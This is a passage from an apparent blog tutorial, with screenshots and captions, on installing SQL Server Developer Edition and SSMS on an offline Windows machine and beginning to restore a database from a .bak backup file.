<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmedYHat30ueb6R_0Hmtf4GXBnc0I59zPEh88iyvVO0FO8IrC3A5DME-K46ixZeYsImUhq0GkL5veOXVpsJUQ2xt8rgag_p4r_KzKzHp13rOY3aHk0WQtuNTFmqJGLmtHThG1_W8CNnIO-/s1600/installnewserver.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="510" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmedYHat30ueb6R_0Hmtf4GXBnc0I59zPEh88iyvVO0FO8IrC3A5DME-K46ixZeYsImUhq0GkL5veOXVpsJUQ2xt8rgag_p4r_KzKzHp13rOY3aHk0WQtuNTFmqJGLmtHThG1_W8CNnIO-/s640/installnewserver.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose to install a new SQL Server instance</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Once you click that option, you will see a the installation screen. Because we have the developer edition, there is no need to insert a product key, so just click Next.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnbjG4Iy50IKyDToFHsqBt7HZRVxLoDTc2rcwpd3e6DRUH_KpZeGgMphudqNN81wPIQ-Ap1QiPIMBzaP_eBSqNwnujE7xOi2eSl_pQBsvLKGApMO_WzD8H61H48eAM_2Hacc6BncrvZzz/s1600/productkey-install-screen.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnbjG4Iy50IKyDToFHsqBt7HZRVxLoDTc2rcwpd3e6DRUH_KpZeGgMphudqNN81wPIQ-Ap1QiPIMBzaP_eBSqNwnujE7xOi2eSl_pQBsvLKGApMO_WzD8H61H48eAM_2Hacc6BncrvZzz/s640/productkey-install-screen.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">"Product Key" screen</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Check the box on the next screen next to "I accept the license terms".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXCvIdME4TfEkfvEEtTa7F4H3DnDTYRKKbZuoMfQSFOUaOenABTAbgHJp2VcfeBwUwDM7bPO_54bIQweam6hE3v52RVTFCjExMqtMeGx-hXqQK_UI2WdXZGFtVHp2OlArpMPRwvPkLc32u/s1600/license-terms.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXCvIdME4TfEkfvEEtTa7F4H3DnDTYRKKbZuoMfQSFOUaOenABTAbgHJp2VcfeBwUwDM7bPO_54bIQweam6hE3v52RVTFCjExMqtMeGx-hXqQK_UI2WdXZGFtVHp2OlArpMPRwvPkLc32u/s640/license-terms.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Accept the license terms (you did read all the way through it, right?)</span></i></td></tr>
</tbody></table>
<br />
<br />
<span style="font-size: large;">Your system is offline, so there is no need to check the box about using Microsoft Update, so just click Next.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg688Lj0ymLZFUxQWDF_Cx6E-HwlmkBB1PWDH2zrNZJowQsp6j3Vuqt6bx3S1hFthb221aaqUTr4jBQyBBP-pFVitxvoJcFgtcilMjbCcrxAmBThqz1CTVMoLiFZQZLlplEpB_NNV-LRbyj/s1600/use-ms-update.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg688Lj0ymLZFUxQWDF_Cx6E-HwlmkBB1PWDH2zrNZJowQsp6j3Vuqt6bx3S1hFthb221aaqUTr4jBQyBBP-pFVitxvoJcFgtcilMjbCcrxAmBThqz1CTVMoLiFZQZLlplEpB_NNV-LRbyj/s640/use-ms-update.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Our system is offline, so this does not apply</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Again, because the system is offline, you will see an error message saying it could not search for updates. This is fine, so just click Next.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYukFW1w4cas7DnCmpt0-kJEeV5NVsrSYpM4iRFdEYFpTlOmGTCTHF4n2zBAGuTJg0tV-TvjjAX0oCCvs8JI_GNhgjAvTwq8qseG_IIWU7E7Pw45rtwyxkQUIWSsRIUWcy-LJiKwBETYra/s1600/this_is_fine.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYukFW1w4cas7DnCmpt0-kJEeV5NVsrSYpM4iRFdEYFpTlOmGTCTHF4n2zBAGuTJg0tV-TvjjAX0oCCvs8JI_GNhgjAvTwq8qseG_IIWU7E7Pw45rtwyxkQUIWSsRIUWcy-LJiKwBETYra/s640/this_is_fine.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Looks bad, but it is ok as our system is offline, so this is fine!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You should now see a screen labeled "Install Rules" that should list a couple of passed items and a couple of failed items. The .NET Application security should have a warning because the system is offline. However, depending on your system settings, the Windows Firewall may generate a warning because it is on, or it may pass because it is off.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWNESbA-ItYV-qyOoX6T_jDuT1vHygs5QxRp-LeXWZPhTcud4T7IVGXd81ujDHHTm-6M_J74FzS7Awor_gwpaFpMXtDBz0AtUgAWXpq9lNHS_6jwm4LL3cyrU9NK84aC60Nv4yJMHWngrZ/s1600/install_rules.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWNESbA-ItYV-qyOoX6T_jDuT1vHygs5QxRp-LeXWZPhTcud4T7IVGXd81ujDHHTm-6M_J74FzS7Awor_gwpaFpMXtDBz0AtUgAWXpq9lNHS_6jwm4LL3cyrU9NK84aC60Nv4yJMHWngrZ/s640/install_rules.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">"Install Rules" status</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You should now see a screen labeled "Feature Selection". With this you can choose to install everything, but in my limited testing just selecting "Database Engine Services" should be enough. You can also choose where to install the files, but again the default(s) should be sufficient.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv75P6Ajeakzw5M9UTBnDH38WObz5sKoWE2cq1nejJqUl_33z1usU2jQC1qiT4hGjkw3XRcmhMYIPDqOS3nk_6kqXnZOfNGFVCXsjy7F79VrL2BYALceB7P6S1lmSueSOTzDKfGEFj2GHf/s1600/database_engine_services.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv75P6Ajeakzw5M9UTBnDH38WObz5sKoWE2cq1nejJqUl_33z1usU2jQC1qiT4hGjkw3XRcmhMYIPDqOS3nk_6kqXnZOfNGFVCXsjy7F79VrL2BYALceB7P6S1lmSueSOTzDKfGEFj2GHf/s640/database_engine_services.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Feature Selection. Select as little, or as much, as you would like!</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span><span style="font-size: large;">It may take a few minutes, but when it is finished you will see a screen labeled "Instance Configuration". You can choose whatever options that you would like, but I personally prefer to leave the default options again.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9uhUCwdw9Sra9zOwgskl7rdLdUrXLbYhdk4Vab2-k-ohINGkHMTZKnYHcBgO9T7LQswZ5NAMCD80VP1Ds7y0Tsy4cBfucrRjq5xrbCsH4Q0_ApTn3mezTdMs9_zqWDcs6jQU3nmMv13GK/s1600/instance_configuration.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9uhUCwdw9Sra9zOwgskl7rdLdUrXLbYhdk4Vab2-k-ohINGkHMTZKnYHcBgO9T7LQswZ5NAMCD80VP1Ds7y0Tsy4cBfucrRjq5xrbCsH4Q0_ApTn3mezTdMs9_zqWDcs6jQU3nmMv13GK/s640/instance_configuration.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">"Instance Configuration"</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">It may take a few minutes, but when it is finished you will see a screen labeled "Server Configuration". You can choose different options of course, but again I prefer to leave the defaults.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcjYri6DVcoDSOI4ZQBV94_N1soNn8j1zMbO5yNAwvor6WnuK7JEeCZUPm52HX15vSBoL6_YgRbpn2xYxAplCAIaTr3nZg5B5urI59JNiSjFCQiy-YZAzw-rAp34D0QUJyGxczzQP7spnK/s1600/server-configuration.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcjYri6DVcoDSOI4ZQBV94_N1soNn8j1zMbO5yNAwvor6WnuK7JEeCZUPm52HX15vSBoL6_YgRbpn2xYxAplCAIaTr3nZg5B5urI59JNiSjFCQiy-YZAzw-rAp34D0QUJyGxczzQP7spnK/s640/server-configuration.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>"Server Configuration"</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Next you should see a screen labeled "Database Engine Configuration". I prefer to just leave the "Windows Authentication Mode" checked. You must also choose an account(s) for the SQL Server Administrator, the easiest option for this is to click the "Add Current User" button and it will populate. Once that is finished, click Next.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZSEL3AxZbqBh6k8zYDFNYJ6vATxiGhYlqOSANeghRBqXw1Nz5jXa1c2Qw_0poeQPwiD3pwtLbCHFmpgsEeNHqgw8Dnt2d0AtwXD_BHS54dI08smLRl3n2sQ8XiiIpZQVgeZZMRaQzgTaZ/s1600/database-engine-configuration.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZSEL3AxZbqBh6k8zYDFNYJ6vATxiGhYlqOSANeghRBqXw1Nz5jXa1c2Qw_0poeQPwiD3pwtLbCHFmpgsEeNHqgw8Dnt2d0AtwXD_BHS54dI08smLRl3n2sQ8XiiIpZQVgeZZMRaQzgTaZ/s640/database-engine-configuration.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Database Engine Configuration. Don't forget to add a SQL Server administrator!</span></i></td></tr>
</tbody></table>
<br />
<br />
<span style="font-size: large;">Now that ALL that work is done, you should a see a screen that resembles a tree hierarchy. Now you can click the Install button and install your SQL Server instance! This will probably take some time, so be patient!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfjJ2cszcVX9XLamk8WHZJZf9IeNggG8J_t2a0ZGZA09qSgbbZArb2U0M5QdDQYU-tZUwafqQuECVqXbIpn8BwxuJOgAw-LDkkZDWlao_BgfZ9xIr4iSGCP1hM4K-AV4n9yNMUdfKlmbmY/s1600/ready_to_install.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfjJ2cszcVX9XLamk8WHZJZf9IeNggG8J_t2a0ZGZA09qSgbbZArb2U0M5QdDQYU-tZUwafqQuECVqXbIpn8BwxuJOgAw-LDkkZDWlao_BgfZ9xIr4iSGCP1hM4K-AV4n9yNMUdfKlmbmY/s640/ready_to_install.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Ready to install at last!!</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Once that is finished, you should see a screen that is labeled "Complete" and several options should all say "Succeeded" next to them. You can now click "Close".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgilfZ0e1hOZU8-A9FoGwqso9eW9ZFpbV0j0Jqgh-wlnBssAcl4dDooott1WCKYNyTOORKhYTP97VE7tI7i0tqiUxKYpjkTXkZeWMLk5MdTZ9evcgLaAjWSd_pK5amVBYdM88KzAh36OAHl/s1600/complete.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgilfZ0e1hOZU8-A9FoGwqso9eW9ZFpbV0j0Jqgh-wlnBssAcl4dDooott1WCKYNyTOORKhYTP97VE7tI7i0tqiUxKYpjkTXkZeWMLk5MdTZ9evcgLaAjWSd_pK5amVBYdM88KzAh36OAHl/s640/complete.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">All done!!</span></i></td></tr>
</tbody></table>
<br />
<br />
<span style="font-size: large;"><b>Step 6: Install SSMS</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now, despite there being a link for Install SQL Server Management Tools in the Installation link on the SQL Server installation option, that simply opens a new page and tries to install it, which means you need an internet connection to do so. That is exactly why we downloaded SSMS separately and have it on our offline system ready to install!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">To begin the process, double click the executable, and you should see a screen with "Microsoft SQL Server Management Studio" on it. All we have to do here is click "Install".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ2rP02nVhTnpeiV-HTEguMJ6E954j6c1By_sag-ruJxWBktwptj5PGyeqH2kTdGWnjysC4i_esUTow6QoTp8n2ftKnh5siDpywZIDBuUoavhU-90A7vxP5wuZYz4WatCH0WxLfN4ZMWkk/s1600/install-ssms.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ2rP02nVhTnpeiV-HTEguMJ6E954j6c1By_sag-ruJxWBktwptj5PGyeqH2kTdGWnjysC4i_esUTow6QoTp8n2ftKnh5siDpywZIDBuUoavhU-90A7vxP5wuZYz4WatCH0WxLfN4ZMWkk/s640/install-ssms.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Installation screen for SSMS</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You should see a screen that involves loading packages, as the process will likely take a few minutes to install.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKkwOhChKZIMJ9mJPTln35NYKKTmYUxHHL8oYnvP89NxMGI-9TWJEIbJ4n5r5jhXYQLo96Pm7XsVfdBq6QAh8zibQHPYfZU1GxPnhU5Zs5Fh7bj5ye23NNjVL_HXLJ48HeqMyD05vxui4D/s1600/loading-packages.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKkwOhChKZIMJ9mJPTln35NYKKTmYUxHHL8oYnvP89NxMGI-9TWJEIbJ4n5r5jhXYQLo96Pm7XsVfdBq6QAh8zibQHPYfZU1GxPnhU5Zs5Fh7bj5ye23NNjVL_HXLJ48HeqMyD05vxui4D/s640/loading-packages.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Packages are loading, this may take a bit!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Once the installation is "complete", you will have to restart the system in order for the installation to "complete" (because it is Windows, after all!)</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5J1C1zEdczOa0Ppsr9Kx73F-1BNqHF6It-A8cEffNjySdzv64HyQXBy9utyL5r5rLlfrFxNmYhMN9b1GxCC-WIO9knMXsBRGYJ3p6N9jC8bKNta2J9wLTu9QKvUVKSBWjq4CF9piAuJQn/s1600/restartforcomplete.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5J1C1zEdczOa0Ppsr9Kx73F-1BNqHF6It-A8cEffNjySdzv64HyQXBy9utyL5r5rLlfrFxNmYhMN9b1GxCC-WIO9knMXsBRGYJ3p6N9jC8bKNta2J9wLTu9QKvUVKSBWjq4CF9piAuJQn/s640/restartforcomplete.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Installation is complete, but we have to restart to complete the installation. Huh??</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><b>Step 7: Launch SSMS & restore the SQL database</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now that SQL Server and SSMS are both installed on our system, we can launch SSMS. Navigate to Program Files and launch the executable. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJxFLqOov-JGU83y18HlIDDpNpZ-WKkuX-8LsG-NB2u93Vcy8g-HBak12pnLkwv0YICrY3393kQ2OAVB2oB3RPCRFtpmuvegZxriLQN-_fdl51aDdcHcvNhpnPcfpPUqNh-30epuAmXkdU/s1600/Launch_SSMS.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJxFLqOov-JGU83y18HlIDDpNpZ-WKkuX-8LsG-NB2u93Vcy8g-HBak12pnLkwv0YICrY3393kQ2OAVB2oB3RPCRFtpmuvegZxriLQN-_fdl51aDdcHcvNhpnPcfpPUqNh-30epuAmXkdU/s640/Launch_SSMS.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Getting ready to launch SSMS for the first time!</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">There may be a brief loading screen for user settings, then you should see the SSMS console, complete with the Connect to Server Window.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF69RrnRnvGLnW0WIYLFd44vFMqGL-c3HgygCi-FIHeZcrf6ILZq1BXdZK4eeTUQejyU_qyAnF5gNc1D_GGJ1_lqh6SE7Y0Bgx78SrpUhfvjMYKj5_AA3HkpCeg4uVgXmwljCgkzDq1FjK/s1600/ssms-console.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF69RrnRnvGLnW0WIYLFd44vFMqGL-c3HgygCi-FIHeZcrf6ILZq1BXdZK4eeTUQejyU_qyAnF5gNc1D_GGJ1_lqh6SE7Y0Bgx78SrpUhfvjMYKj5_AA3HkpCeg4uVgXmwljCgkzDq1FjK/s640/ssms-console.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">SSMS main console</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">All you should have to do is click the "Connect" button and you should see a tree view options in the "Object Explorer" window.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg2Pf3oFGt4U2ovbTlCjhRIdx41MsItX7dOMKkiWknZ3N8lFl1hqW7icbxpCbsN2gbylLPJxaAhrAA0Tj9Wj5J8MYfh3ls-M29KFg_SlQ1T71mDYZ30rjjqc5XP0ncVWUWzkP2Vbm8mTuP/s1600/ssms-objectexplorer.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="526" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg2Pf3oFGt4U2ovbTlCjhRIdx41MsItX7dOMKkiWknZ3N8lFl1hqW7icbxpCbsN2gbylLPJxaAhrAA0Tj9Wj5J8MYfh3ls-M29KFg_SlQ1T71mDYZ30rjjqc5XP0ncVWUWzkP2Vbm8mTuP/s640/ssms-objectexplorer.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The "Object Explorer" window is populated</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">We are interested in the "Databases" option, since we are going to be restoring a database from a backup file. Right click on the "Databases" folder and choose the "Restore Database" option.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOGCsblYOpbnQP7wfGhVRDW4Z9uYAmItzL20knV_3DxXtCftX7TwpyCjLACZSW5gGLfmJTika3U8bJh_T_HHfRWmxwLt4tyA4nxXsrwB-swQXh2rqr87321FwrrSeMs-027sV8lp1i8Q2Y/s1600/ssms-restoredb.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOGCsblYOpbnQP7wfGhVRDW4Z9uYAmItzL20knV_3DxXtCftX7TwpyCjLACZSW5gGLfmJTika3U8bJh_T_HHfRWmxwLt4tyA4nxXsrwB-swQXh2rqr87321FwrrSeMs-027sV8lp1i8Q2Y/s640/ssms-restoredb.jpg" width="552" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose the "Restore Database" option</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Now we will get a new popup window that is labeled "Restore Database".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqMSbir8WcSlljEyypFw3_d5LdrbbnmSWiRHfyH7d9j4vV95qqwYWb8k0lr2jqtbm9upc7cpOEzaol7tAx67vqy6DaOqs4GDhl4wYD1ne1ctC3zJlrO1tLnGWK6umQQnePNXQMSZdjJWin/s1600/restoredb-popup.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="564" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqMSbir8WcSlljEyypFw3_d5LdrbbnmSWiRHfyH7d9j4vV95qqwYWb8k0lr2jqtbm9upc7cpOEzaol7tAx67vqy6DaOqs4GDhl4wYD1ne1ctC3zJlrO1tLnGWK6umQQnePNXQMSZdjJWin/s640/restoredb-popup.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The "Restore Database" popup window</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">We are going to choose the "Device" option under "Source", then click on the box with the three dots.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBtyTEsHFdkw052FYZocRDKHjnGa71ZJbooZ5D3CG9Ckx6O9wzE_PGmZl6_Yr_ckR1BolUSUqm5qBKkPrROJCoauJteVZHCKE1LeQbepSk0pmSvGy8vpodK7fnhCfrNhyphenhyphenHOCsc-KmC_J49/s1600/threedots.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="564" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBtyTEsHFdkw052FYZocRDKHjnGa71ZJbooZ5D3CG9Ckx6O9wzE_PGmZl6_Yr_ckR1BolUSUqm5qBKkPrROJCoauJteVZHCKE1LeQbepSk0pmSvGy8vpodK7fnhCfrNhyphenhyphenHOCsc-KmC_J49/s640/threedots.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Tick "Device", then click the box with three dots</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">This brings up a new window titled "Select backup devices". Our Backup media type will be file, and we will click the "Add" button to add our .bak file (PRO TIP: Saving the .bak file on the root of a drive (like in "C:\" makes it much easier to find and navigate to)). Select the file and then click "OK".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLWCOr1qPE8ZeIiOYhXsFWL9lyVhwWiZeSrSdZ7CRWG8prTi14ow6-kWy1qe8xGSgz5t8fezGQ6NvK5XP1c7sQuFWmPzEjR4El21H4aEpsytO0LLZN5NbwzcS4-eQWa3WeMFSXeWuPS_tA/s1600/addbackupbox.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLWCOr1qPE8ZeIiOYhXsFWL9lyVhwWiZeSrSdZ7CRWG8prTi14ow6-kWy1qe8xGSgz5t8fezGQ6NvK5XP1c7sQuFWmPzEjR4El21H4aEpsytO0LLZN5NbwzcS4-eQWa3WeMFSXeWuPS_tA/s640/addbackupbox.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Click the "Add" button</span></i></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
